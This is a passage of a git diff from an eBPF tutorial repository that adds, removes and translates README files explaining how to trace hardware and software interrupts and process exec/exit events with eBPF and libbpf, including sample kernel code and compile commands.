entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers. -通过学习本章节内容,您应该已经掌握了如何在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件的方法,以及如何分析这些事件以识别内核中的性能问题和其他与中断处理相关的问题。这些技能对于分析和优化 Linux 内核的性能至关重要。 +By studying the content of this chapter, you should have mastered the methods of capturing interrupt events with hardirqs or softirqs in eBPF, as well as how to analyze these events to identify performance issues and other problems related to interrupt handling in the kernel. These skills are crucial for analyzing and optimizing the performance of the Linux kernel. -为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 +To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at . + +> The original link of this article: diff --git a/src/10-hardirqs/README.zh.md b/src/10-hardirqs/README.zh.md new file mode 100644 index 0000000..33e8173 --- /dev/null +++ b/src/10-hardirqs/README.zh.md @@ -0,0 +1,262 @@ +# eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件 + +eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 + +本文是 eBPF 入门开发实践教程的第十篇,在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件。 +hardirqs 和 softirqs 是 Linux 内核中两种不同类型的中断处理程序。它们用于处理硬件设备产生的中断请求,以及内核中的异步事件。在 eBPF 中,我们可以使用同名的 eBPF 工具 hardirqs 和 softirqs 来捕获和分析内核中与中断处理相关的信息。 + +## hardirqs 和 softirqs 是什么? + +hardirqs 是硬件中断处理程序。当硬件设备产生一个中断请求时,内核会将该请求映射到一个特定的中断向量,然后执行与之关联的硬件中断处理程序。硬件中断处理程序通常用于处理设备驱动程序中的事件,例如设备数据传输完成或设备错误。 + +softirqs 是软件中断处理程序。它们是内核中的一种底层异步事件处理机制,用于处理内核中的高优先级任务。softirqs 通常用于处理网络协议栈、磁盘子系统和其他内核组件中的事件。与硬件中断处理程序相比,软件中断处理程序具有更高的灵活性和可配置性。 + +## 实现原理 + +在 eBPF 中,我们可以通过挂载特定的 kprobe 或者 tracepoint 来捕获和分析 hardirqs 和 softirqs。为了捕获 hardirqs 和 softirqs,需要在相关的内核函数上放置 eBPF 程序。这些函数包括: + +- 对于 hardirqs:irq_handler_entry 和 irq_handler_exit。 +- 对于 softirqs:softirq_entry 和 softirq_exit。 + +当内核处理 hardirqs 或 softirqs 时,这些 eBPF 程序会被执行,从而收集相关信息,如中断向量、中断处理程序的执行时间等。收集到的信息可以用于分析内核中的性能问题和其他与中断处理相关的问题。 + +为了捕获 hardirqs 和 softirqs,可以遵循以下步骤: + +1. 在 eBPF 程序中定义用于存储中断信息的数据结构和映射。 +2. 编写 eBPF 程序,将其挂载到相应的内核函数上,以捕获 hardirqs 或 softirqs。 +3. 在 eBPF 程序中,收集中断处理程序的相关信息,并将这些信息存储在映射中。 +4. 在用户空间应用程序中,读取映射中的数据以分析和展示中断处理信息。 + +通过上述方法,我们可以在 eBPF 中使用 hardirqs 和 softirqs 捕获和分析内核中的中断事件,以识别潜在的性能问题和与中断处理相关的问题。 + +## hardirqs 代码实现 + +hardirqs 程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。 + +```c +// SPDX-License-Identifier: GPL-2.0 +// Copyright (c) 2020 Wenbo Zhang +#include +#include +#include +#include +#include "hardirqs.h" +#include "bits.bpf.h" +#include "maps.bpf.h" + +#define MAX_ENTRIES 256 + +const volatile bool filter_cg = false; +const volatile bool targ_dist = false; +const volatile bool targ_ns = false; +const volatile bool do_count = false; + +struct { + __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); + __type(key, u32); + __type(value, u32); + __uint(max_entries, 1); +} cgroup_map SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); + __uint(max_entries, 1); + __type(key, u32); + __type(value, u64); +} start SEC(".maps"); + +struct { + __uint(type, BPF_MAP_TYPE_HASH); + __uint(max_entries, MAX_ENTRIES); + __type(key, struct irq_key); + __type(value, struct info); +} infos SEC(".maps"); + +static struct info zero; + +static int handle_entry(int irq, struct irqaction *action) +{ + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + if (do_count) { + struct irq_key key = {}; + struct info *info; + + bpf_probe_read_kernel_str(&key.name, sizeof(key.name), BPF_CORE_READ(action, name)); + info = bpf_map_lookup_or_try_init(&infos, &key, &zero); + if (!info) + return 0; + info->count += 1; + return 0; + } else { + u64 ts = bpf_ktime_get_ns(); + u32 key = 0; + + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + bpf_map_update_elem(&start, &key, &ts, BPF_ANY); + return 0; + } +} + +static int handle_exit(int irq, struct irqaction *action) +{ + struct irq_key ikey = {}; + struct info *info; + u32 key = 0; + u64 delta; + u64 *tsp; + + if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) + return 0; + + tsp = bpf_map_lookup_elem(&start, &key); + if (!tsp) + return 0; + + delta = bpf_ktime_get_ns() - *tsp; + if (!targ_ns) + delta /= 1000U; + + bpf_probe_read_kernel_str(&ikey.name, sizeof(ikey.name), BPF_CORE_READ(action, name)); + info = bpf_map_lookup_or_try_init(&infos, &ikey, &zero); + if (!info) + return 0; + + if (!targ_dist) { + info->count += delta; + } else { + u64 slot; + + slot = log2(delta); + if (slot >= MAX_SLOTS) + slot = MAX_SLOTS - 1; + info->slots[slot]++; + } + + return 0; +} + +SEC("tp_btf/irq_handler_entry") +int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) +{ + return handle_entry(irq, action); +} + +SEC("tp_btf/irq_handler_exit") +int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) +{ + return handle_exit(irq, action); +} + +SEC("raw_tp/irq_handler_entry") +int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) +{ + return handle_entry(irq, action); +} + +SEC("raw_tp/irq_handler_exit") +int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) +{ + return handle_exit(irq, action); +} + +char LICENSE[] SEC("license") = "GPL"; +``` + +这段代码是一个 eBPF 程序,用于捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。程序的主要目的是获取中断处理程序的名称、执行次数和执行时间,并以直方图的形式展示执行时间的分布。让我们一步步分析这段代码。 + +1. 包含必要的头文件和定义数据结构: + + ```c + #include + #include + #include + #include + #include "hardirqs.h" + #include "bits.bpf.h" + #include "maps.bpf.h" + ``` + + 该程序包含了 eBPF 开发所需的标准头文件,以及用于定义数据结构和映射的自定义头文件。 + +2. 定义全局变量和映射: + + ```c + + #define MAX_ENTRIES 256 + + const volatile bool filter_cg = false; + const volatile bool targ_dist = false; + const volatile bool targ_ns = false; + const volatile bool do_count = false; + + ... + ``` + + 该程序定义了一些全局变量,用于配置程序的行为。例如,`filter_cg` 控制是否过滤 cgroup,`targ_dist` 控制是否显示执行时间的分布等。此外,程序还定义了三个映射,分别用于存储 cgroup 信息、开始时间戳和中断处理程序的信息。 + +3. 定义两个辅助函数 `handle_entry` 和 `handle_exit`: + + 这两个函数分别在中断处理程序的入口和出口处被调用。`handle_entry` 记录开始时间戳或更新中断计数,`handle_exit` 计算中断处理程序的执行时间,并将结果存储到相应的信息映射中。 + +4. 定义 eBPF 程序的入口点: + + ```c + + SEC("tp_btf/irq_handler_entry") + int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) + { + return handle_entry(irq, action); + } + + SEC("tp_btf/irq_handler_exit") + int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) + { + return handle_exit(irq, action); + } + + SEC("raw_tp/irq_handler_entry") + int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) + { + return handle_entry(irq, action); + } + + SEC("raw_tp/irq_handler_exit") + int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) + { + return handle_exit(irq, action); + } + ``` + + 这里定义了四个 eBPF 程序入口点,分别用于捕获中断处理程序的入口和出口事件。`tp_btf` 和 `raw_tp` 分别代表使用 BPF Type Format(BTF)和原始 tracepoints 捕获事件。这样可以确保程序在不同内核版本上可以移植和运行。 + +Softirq 代码也类似,这里就不再赘述了。 + +## 运行代码 + +eunomia-bpf 是一个结合 Wasm 的开源 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +要编译这个程序,请使用 ecc 工具: + +```console +$ ecc hardirqs.bpf.c +Compiling bpf object... +Packing ebpf object and config into package.json... +``` + +然后运行: + +```console +sudo ecli run ./package.json +``` + +## 总结 + +在本章节(eBPF 入门开发实践教程十:在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件)中,我们学习了如何使用 eBPF 程序捕获和分析内核中硬件中断处理程序(hardirqs)的执行信息。我们详细讲解了示例代码,包括如何定义数据结构、映射以及 eBPF 程序入口点,以及如何在中断处理程序的入口和出口处调用辅助函数来记录执行信息。 + +通过学习本章节内容,您应该已经掌握了如何在 eBPF 中使用 hardirqs 或 softirqs 捕获中断事件的方法,以及如何分析这些事件以识别内核中的性能问题和其他与中断处理相关的问题。这些技能对于分析和优化 Linux 内核的性能至关重要。 + +为了更好地理解和实践 eBPF 编程,我们建议您阅读 eunomia-bpf 的官方文档: 。此外,我们还为您提供了完整的教程和源代码,您可以在 中查看和学习。希望本教程能够帮助您顺利入门 eBPF 开发,并为您的进一步学习和实践提供有益的参考。 diff --git a/src/10-hardirqs/README_en.md b/src/10-hardirqs/README_en.md deleted file mode 100644 index 4de28a9..0000000 --- a/src/10-hardirqs/README_en.md +++ /dev/null @@ -1,262 +0,0 @@ -# eBPF Tutorial by Example 10: Capturing Interrupts with hardirqs or softirqs - -eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code at runtime in the kernel. - -This article is the tenth part of the eBPF Tutorial by Example, focusing on capturing interrupt events using hardirqs or softirqs in eBPF. -hardirqs and softirqs are two different types of interrupt handlers in the Linux kernel. They are used to handle interrupt requests generated by hardware devices, as well as asynchronous events in the kernel. In eBPF, we can use the eBPF tools hardirqs and softirqs to capture and analyze information related to interrupt handling in the kernel. - -## What are hardirqs and softirqs? - -hardirqs are hardware interrupt handlers. When a hardware device generates an interrupt request, the kernel maps it to a specific interrupt vector and executes the associated hardware interrupt handler. Hardware interrupt handlers are commonly used to handle events in device drivers, such as completion of device data transfer or device errors. - -softirqs are software interrupt handlers. They are a low-level asynchronous event handling mechanism in the kernel, used for handling high-priority tasks in the kernel. softirqs are commonly used to handle events in the network protocol stack, disk subsystem, and other kernel components. Compared to hardware interrupt handlers, software interrupt handlers have more flexibility and configurability. - -## Implementation Details - -In eBPF, we can capture and analyze hardirqs and softirqs by attaching specific kprobes or tracepoints. To capture hardirqs and softirqs, eBPF programs need to be placed on relevant kernel functions. These functions include: - -- For hardirqs: irq_handler_entry and irq_handler_exit. -- For softirqs: softirq_entry and softirq_exit. - -When the kernel processes hardirqs or softirqs, these eBPF programs are executed to collect relevant information such as interrupt vectors, execution time of interrupt handlers, etc. The collected information can be used for analyzing performance issues and other interrupt handling related problems in the kernel. - -To capture hardirqs and softirqs, the following steps can be followed: - -1. Define data structures and maps in eBPF programs for storing interrupt information. -2. Write eBPF programs and attach them to the corresponding kernel functions to capture hardirqs or softirqs. -3. In eBPF programs, collect relevant information about interrupt handlers and store this information in the maps. -4. In user space applications, read the data from the maps to analyze and display the interrupt handling information. - -By following the above approach, we can use hardirqs and softirqs in eBPF to capture and analyze interrupt events in the kernel, identifying potential performance issues and interrupt handling related problems. - -## Implementation of hardirqs Code - -The main purpose of the hardirqs program is to obtain the name, execution count, and execution time of interrupt handlers and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step. - -```c -// SPDX-License-Identifier: GPL-2.0 -// Copyright (c) 2020 Wenbo Zhang -#include -#include -#include -#include -#include "hardirqs.h" -#include "bits.bpf.h" -#include "maps.bpf.h" - -#define MAX_ENTRIES 256 - -const volatile bool filter_cg = false; -const volatile bool targ_dist = false; -const volatile bool targ_ns = false; -const volatile bool do_count = false; - -struct { - __uint(type, BPF_MAP_TYPE_CGROUP_ARRAY); - __type(key, u32); - __type(value, u32); - __uint(max_entries, 1); -} cgroup_map SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_PERCPU_ARRAY); - __uint(max_entries, 1); - __type(key, u32); - __type(value, u64); -} start SEC(".maps"); - -struct { - __uint(type, BPF_MAP_TYPE_HASH); - __uint(max_entries, MAX_ENTRIES); - __type(key, struct irq_key); - __type(value, struct info); -} infos SEC(".maps"); - -static struct info zero; - -static int handle_entry(int irq, struct irqaction *action) -{ - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - if (do_count) { - struct irq_key key = {}; - struct info *info; - - bpf_probe_read_kernel_str(&key.name, sizeof(key.name), BPF_CORE_READ(action, name)); - info = bpf_map_lookup_or_try_init(&infos, &key, &zero); - if (!info) - return 0; - info->count += 1; - return 0; - } else { - u64 ts = bpf_ktime_get_ns(); - u32 key = 0; - - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - bpf_map_update_elem(&start, &key, &ts, BPF_ANY); - return 0; - } -} - -static int handle_exit(int irq, struct irqaction *action) -{ - struct irq_key ikey = {}; - struct info *info; - u32 key = 0; - u64 delta; - u64 *tsp; - - if (filter_cg && !bpf_current_task_under_cgroup(&cgroup_map, 0)) - return 0; - - tsp = bpf_map_lookup_elem(&start, &key); - if (!tsp) - return 0; - - delta = bpf_ktime_get_ns() - *tsp; - if (!targ_ns) - delta /= 1000U; - - bpf_probe_read_kernel_str(&ikey.name, sizeof(ikey.name), BPF_CORE_READ(action, name)); - info = bpf_map_lookup_or_try_init(&infos, &ikey, &zero); - if (!info) - return 0; - - if (!targ_dist) { - info->count += delta; - } else { - u64 slot; - - slot = log2(delta); - if (slot >= MAX_SLOTS) - slot = MAX_SLOTS - 1; - info->slots[slot]++; - } - - return 0; -} - -SEC("tp_btf/irq_handler_entry") -int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) -{ - return handle_entry(irq, action); -} - -SEC("tp_btf/irq_handler_exit") -int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) -{ - return handle_exit(irq, action); -} - -SEC("raw_tp/irq_handler_entry") -int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) -{ - return handle_entry(irq, action); -} - -SEC("raw_tp/irq_handler_exit") -int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) -{ - return handle_exit(irq, action); -} - -char LICENSE[] SEC("license") = "GPL"; -``` - -This code is an eBPF program used to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel. The main purpose of the program is to obtain the name, execution count, and execution time of the interrupt handler, and display the distribution of execution time in the form of a histogram. Let's analyze this code step by step. - -1. Include necessary header files and define data structures: - -```c - #include - #include - #include - #include - #include "hardirqs.h" - #include "bits.bpf.h" - #include "maps.bpf.h" -``` - -This program includes the standard header files required for eBPF development, as well as custom header files for defining data structures and maps. - -2. Define global variables and maps: - -```c - #define MAX_ENTRIES 256 - - const volatile bool filter_cg = false; - const volatile bool targ_dist = false; - const volatile bool targ_ns = false; - const volatile bool do_count = false; - - ... -``` - -This program defines some global variables that are used to configure the behavior of the program. For example, `filter_cg` controls whether to filter cgroups, `targ_dist` controls whether to display the distribution of execution time, etc. Additionally, the program defines three maps for storing cgroup information, start timestamps, and interrupt handler information. - -3. Define two helper functions `handle_entry` and `handle_exit`: - -These two functions are called at the entry and exit points of the interrupt handler. `handle_entry` records the start timestamp or updates the interrupt count, while `handle_exit` calculates the execution time of the interrupt handler and stores the result in the corresponding information map. - -4. Define the entry points of the eBPF program: - -```c - SEC("tp_btf/irq_handler_entry") - int BPF_PROG(irq_handler_entry_btf, int irq, struct irqaction *action) - { - return handle_entry(irq, action); - } - - SEC("tp_btf/irq_handler_exit") - int BPF_PROG(irq_handler_exit_btf, int irq, struct irqaction *action) - { - return handle_exit(irq, action); - } - - SEC("raw_tp/irq_handler_entry") - int BPF_PROG(irq_handler_entry, int irq, struct irqaction *action) - { - return handle_entry(irq, action); - } - - SEC("raw_tp/irq_handler_exit") - int BPF_PROG(irq_handler_exit, int irq, struct irqaction *action) - { - return handle_exit(irq, action); - } -``` - -Here, four entry points of the eBPF program are defined, which are used to capture the entry and exit events of the interrupt handler. `tp_btf` and `raw_tp` represent capturing events using BPF Type Format (BTF) and raw tracepoints, respectively. This ensures that the program can be ported and run on different kernel versions. - -The code for Softirq is similar, and I won't elaborate on it here. - -## Run code.Translated content - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain that combines Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the ecc compilation toolchain and ecli runtime. We use eunomia-bpf to compile and run this example. - -To compile this program, use the ecc tool: - -```console -$ ecc hardirqs.bpf.c -Compiling bpf object... -Packing ebpf object and config into package.json... -``` - -Then run: - -```console -sudo ecli run ./package.json -``` - -## Summary - -In this chapter (eBPF Tutorial by Example Ten: Capturing Interrupt Events in eBPF with Hardirqs or Softirqs), we learned how to capture and analyze the execution information of hardware interrupt handlers (hardirqs) in the kernel using eBPF programs. We explained the example code in detail, including how to define data structures, mappings, eBPF program entry points, and how to call helper functions to record execution information at the entry and exit points of interrupt handlers. - -By studying the content of this chapter, you should have mastered the methods of capturing interrupt events with hardirqs or softirqs in eBPF, as well as how to analyze these events to identify performance issues and other problems related to interrupt handling in the kernel. These skills are crucial for analyzing and optimizing the performance of the Linux kernel. - -To better understand and practice eBPF programming, we recommend reading the official documentation of eunomia-bpf: . In addition, we provide a complete tutorial and source code for you to view and learn from at . - -> The original link of this article: diff --git a/src/11-bootstrap/README.md b/src/11-bootstrap/README.md index 48ea26f..0970a50 100644 --- a/src/11-bootstrap/README.md +++ b/src/11-bootstrap/README.md @@ -1,41 +1,41 @@ -# eBPF 入门开发实践教程十一:在 eBPF 中使用 libbpf 开发用户态程序并跟踪 exec() 和 exit() 系统调用 +# eBPF Tutorial by Example 11: Develop User-Space Programs with libbpf and Trace exec() and exit() -eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。 +eBPF (Extended Berkeley Packet Filter) is a powerful network and performance analysis tool on the Linux kernel. It allows developers to dynamically load, update, and run user-defined code during kernel runtime. -在本教程中,我们将了解内核态和用户态的 eBPF 程序是如何协同工作的。我们还将学习如何使用原生的 libbpf 开发用户态程序,将 eBPF 应用打包为可执行文件,实现跨内核版本分发。 +In this tutorial, we will learn how kernel-space and user-space eBPF programs work together. We will also learn how to use the native libbpf to develop user-space programs, package eBPF applications into executable files, and distribute them across different kernel versions. -## libbpf 库,以及为什么需要使用它 +## The libbpf Library and Why We Need to Use It -libbpf 是一个 C 语言库,伴随内核版本分发,用于辅助 eBPF 程序的加载和运行。它提供了用于与 eBPF 系统交互的一组 C API,使开发者能够更轻松地编写用户态程序来加载和管理 eBPF 程序。这些用户态程序通常用于分析、监控或优化系统性能。 +libbpf is a C language library that is distributed with the kernel version to assist in loading and running eBPF programs. It provides a set of C APIs for interacting with the eBPF system, allowing developers to write user-space programs more easily to load and manage eBPF programs. These user-space programs are typically used for system performance analysis, monitoring, or optimization. -使用 libbpf 库有以下优势: +There are several advantages to using the libbpf library: -- 它简化了 eBPF 程序的加载、更新和运行过程。 -- 它提供了一组易于使用的 API,使开发者能够专注于编写核心逻辑,而不是处理底层细节。 -- 它能够确保与内核中的 eBPF 子系统的兼容性,降低了维护成本。 +- It simplifies the process of loading, updating, and running eBPF programs. +- It provides a set of easy-to-use APIs, allowing developers to focus on writing core logic instead of dealing with low-level details. +- It ensures compatibility with the eBPF subsystem in the kernel, reducing maintenance costs. -同时,libbpf 和 BTF(BPF Type Format)都是 eBPF 生态系统的重要组成部分。它们各自在实现跨内核版本兼容方面发挥着关键作用。BTF(BPF Type Format)是一种元数据格式,用于描述 eBPF 程序中的类型信息。BTF 的主要目的是提供一种结构化的方式,以描述内核中的数据结构,以便 eBPF 程序可以更轻松地访问和操作它们。 +At the same time, libbpf and BTF (BPF Type Format) are important components of the eBPF ecosystem. They play critical roles in achieving compatibility across different kernel versions. BTF is a metadata format used to describe type information in eBPF programs. The primary purpose of BTF is to provide a structured way to describe data structures in the kernel so that eBPF programs can access and manipulate them more easily. -BTF 在实现跨内核版本兼容方面的关键作用如下: +The key roles of BTF in achieving compatibility across different kernel versions are as follows: -- BTF 允许 eBPF 程序访问内核数据结构的详细类型信息,而无需对特定内核版本进行硬编码。这使得 eBPF 程序可以适应不同版本的内核,从而实现跨内核版本兼容。 -- 通过使用 BPF CO-RE(Compile Once, Run Everywhere)技术,eBPF 程序可以利用 BTF 在编译时解析内核数据结构的类型信息,进而生成可以在不同内核版本上运行的 eBPF 程序。 +- BTF allows eBPF programs to access detailed type information of kernel data structures without hardcoding specific kernel versions. This enables eBPF programs to adapt to different kernel versions, achieving compatibility across kernel versions. +- By using BPF CO-RE (Compile Once, Run Everywhere) technology, eBPF programs can leverage BTF to parse the type information of kernel data structures during compilation, thereby generating eBPF programs that can run on different kernel versions. -结合 libbpf 和 BTF,eBPF 程序可以在各种不同版本的内核上运行,而无需为每个内核版本单独编译。这极大地提高了 eBPF 生态系统的可移植性和兼容性,降低了开发和维护的难度。 +By combining libbpf and BTF, eBPF programs can run on various kernel versions without the need for separate compilation for each kernel version. This greatly improves the portability and compatibility of the eBPF ecosystem and reduces the difficulty of development and maintenance. -## 什么是 bootstrap +## What is Bootstrap -Bootstrap 是一个使用 libbpf 的完整应用,它利用 eBPF 程序来跟踪内核中的 exec() 系统调用(通过 SEC("tp/sched/sched_process_exec") handle_exec BPF 程序),这主要对应于新进程的创建(不包括 fork() 部分)。此外,它还跟踪进程的 exit() 系统调用(通过 SEC("tp/sched/sched_process_exit") handle_exit BPF 程序),以了解每个进程何时退出。 +Bootstrap is a complete application that utilizes libbpf. It uses eBPF programs to trace the exec() system call in the kernel (handled by the SEC("tp/sched/sched_process_exec") handle_exec BPF program), which mainly corresponds to the creation of new processes (excluding the fork() part). In addition, it also traces the exit() system call of processes (handled by the SEC("tp/sched/sched_process_exit") handle_exit BPF program) to understand when each process exits. -这两个 BPF 程序共同工作,允许捕获关于新进程的有趣信息,例如二进制文件的文件名,以及测量进程的生命周期,并在进程结束时收集有趣的统计信息,例如退出代码或消耗的资源量等。这是深入了解内核内部并观察事物如何真正运作的良好起点。 +These two BPF programs work together to capture interesting information about new processes, such as the file name of the binary and measure the lifecycle of processes. They also collect interesting statistics, such as exit codes or resource consumption, when a process exits. This is a good starting point to gain a deeper understanding of the inner workings of the kernel and observe how things actually operate. -Bootstrap 还使用 argp API(libc 的一部分)进行命令行参数解析,使得用户可以通过命令行选项配置应用行为。这种方式提供了灵活性,让用户能够根据实际需求自定义程序行为。虽然这些功能使用 eunomia-bpf 工具也可以实现,但是这里我们使用 libbpf 可以在用户态提供更高的可扩展性,不过也带来了不少额外的复杂度。 +Bootstrap also uses the argp API (part of libc) for command-line argument parsing, allowing users to configure the behavior of the application through command-line options. This provides flexibility and allows users to customize the program behavior according to their specific needs. While these functionalities can also be achieved using the eunomia-bpf tool, using libbpf here provides higher scalability in user space at the cost of additional complexity. ## Bootstrap -Bootstrap 分为两个部分:内核态和用户态。内核态部分是一个 eBPF 程序,它跟踪 exec() 和 exit() 系统调用。用户态部分是一个 C 语言程序,它使用 libbpf 库来加载和运行内核态程序,并处理从内核态程序收集的数据。 +Bootstrap consists of two parts: kernel space and user space. The kernel space part is an eBPF program that traces the exec() and exit() system calls. The user space part is a C language program that uses the libbpf library to load and run the kernel space program and process the data collected from the kernel space program. -### 内核态 eBPF 程序 bootstrap.bpf.c +### Kernel-space eBPF Program bootstrap.bpf.c ```c // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause @@ -108,7 +108,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) struct event *e; pid_t pid, tid; u64 id, ts, *start_ts, duration_ns = 0; - + /* get PID and TID of exiting thread/process */ id = bpf_get_current_pid_tgid(); pid = id >> 32; @@ -120,8 +120,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) /* if we recorded start of the process, calculate lifetime duration */ start_ts = bpf_map_lookup_elem(&exec_start, &pid); - if (start_ts) - duration_ns = bpf_ktime_get_ns() - *start_ts; + if (start_ts)duration_ns = bpf_ktime_get_ns() - *start_ts; else if (min_duration_ns) return 0; bpf_map_delete_elem(&exec_start, &pid); @@ -151,9 +150,9 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -这段代码是一个内核态 eBPF 程序(bootstrap.bpf.c),主要用于跟踪 exec() 和 exit() 系统调用。它通过 eBPF 程序捕获进程的创建和退出事件,并将相关信息发送到用户态程序进行处理。下面是对代码的详细解释。 +This code is a kernel-level eBPF program (`bootstrap.bpf.c`) used to trace `exec()` and `exit()` system calls. It captures process creation and exit events using an eBPF program and sends the relevant information to a user-space program for processing. Below is a detailed explanation of the code. -首先,我们引入所需的头文件,定义 eBPF 程序的许可证以及两个 eBPF maps:exec_start 和 rb。exec_start 是一个哈希类型的 eBPF map,用于存储进程开始执行时的时间戳。rb 是一个环形缓冲区类型的 eBPF map,用于存储捕获的事件数据,并将其发送到用户态程序。 +First, we include the necessary headers and define the license for the eBPF program. We also define two eBPF maps: `exec_start` and `rb`. `exec_start` is a hash type eBPF map used to store the timestamp when a process starts executing. `rb` is a ring buffer type eBPF map used to store captured event data and send it to the user-space program. ```c #include "vmlinux.h" @@ -179,7 +178,7 @@ struct { const volatile unsigned long long min_duration_ns = 0; ``` -接下来,我们定义了一个名为 handle_exec 的 eBPF 程序,它会在进程执行 exec() 系统调用时触发。首先,我们从当前进程中获取 PID,记录进程开始执行的时间戳,然后将其存储在 exec_start map 中。 +Next, we define an eBPF program named `handle_exec` which is triggered when a process executes the `exec()` system call. First, we retrieve the PID from the current process, record the timestamp when the process starts executing, and store it in the `exec_start` map. ```c SEC("tp/sched/sched_process_exec") @@ -194,7 +193,7 @@ int handle_exec(struct trace_event_raw_sched_process_exec *ctx) } ``` -然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名等。之后,我们将这些数据发送到用户态程序进行处理。 +Then, we reserve an event structure from the circular buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, and process name. Afterwards, we send this data to the user-mode program for processing. ```c // reserve sample from BPF ringbuf @@ -218,7 +217,7 @@ int handle_exec(struct trace_event_raw_sched_process_exec *ctx) return 0; ``` -最后,我们定义了一个名为 handle_exit 的 eBPF 程序,它会在进程执行 exit() 系统调用时触发。首先,我们从当前进程中获取 PID 和 TID(线程 ID)。如果 PID 和 TID 不相等,说明这是一个线程退出,我们将忽略此事件。 +Finally, we define an eBPF program named `handle_exit` that will be triggered when a process executes the `exit()` system call. First, we retrieve the PID and TID (thread ID) from the current process. If the PID and TID are not equal, it means that this is a thread exit, and we will ignore this event. ```c SEC("tp/sched/sched_process_exit") @@ -237,7 +236,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) } ``` -接着,我们查找之前存储在 exec_start map 中的进程开始执行的时间戳。如果找到了时间戳,我们将计算进程的生命周期(持续时间),然后从 exec_start map 中删除该记录。如果未找到时间戳且指定了最小持续时间,则直接返回。 +Next, we look up the timestamp of when the process started execution, which was previously stored in the `exec_start` map. If a timestamp is found, we calculate the process's lifetime duration and then remove the record from the `exec_start` map. If a timestamp is not found and a minimum duration is specified, we return directly. ```c // if we recorded start of the process, calculate lifetime duration @@ -253,7 +252,7 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) return 0; ``` -然后,我们从环形缓冲区 map rb 中预留一个事件结构,并填充相关数据,如进程 ID、父进程 ID、进程名、进程持续时间等。最后,我们将这些数据发送到用户态程序进行处理。 +Then, we reserve an event structure from the circular buffer map `rb` and fill in the relevant data, such as the process ID, parent process ID, process name, and process duration. Finally, we send this data to the user-mode program for processing. ```c /* reserve sample from BPF ringbuf */ @@ -265,21 +264,21 @@ int handle_exit(struct trace_event_raw_sched_process_template* ctx) task = (struct task_struct *)bpf_get_current_task(); e->exit_event = true; - e->duration_ns = duration_ns; - e->pid = pid; - e->ppid = BPF_CORE_READ(task, real_parent, tgid); - e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); + e->duration_ns = duration_ns;``` +e->pid = pid; +e->ppid = BPF_CORE_READ(task, real_parent, tgid); +e->exit_code = (BPF_CORE_READ(task, exit_code) >> 8) & 0xff; +bpf_get_current_comm(&e->comm, sizeof(e->comm)); - /* send data to user-space for post-processing */ - bpf_ringbuf_submit(e, 0); - return 0; +/* send data to user-space for post-processing */ +bpf_ringbuf_submit(e, 0); +return 0; } ``` -这样,当进程执行 exec() 或 exit() 系统调用时,我们的 eBPF 程序会捕获相应的事件,并将详细信息发送到用户态程序进行后续处理。这使得我们可以轻松地监控进程的创建和退出,并获取有关进程的详细信息。 +This way, when a process executes the exec() or exit() system calls, our eBPF program captures the corresponding events and sends detailed information to the user space program for further processing. This allows us to easily monitor process creation and termination and obtain detailed information about the processes. -除此之外,在 bootstrap.h 中,我们还定义了和用户态交互的数据结构: 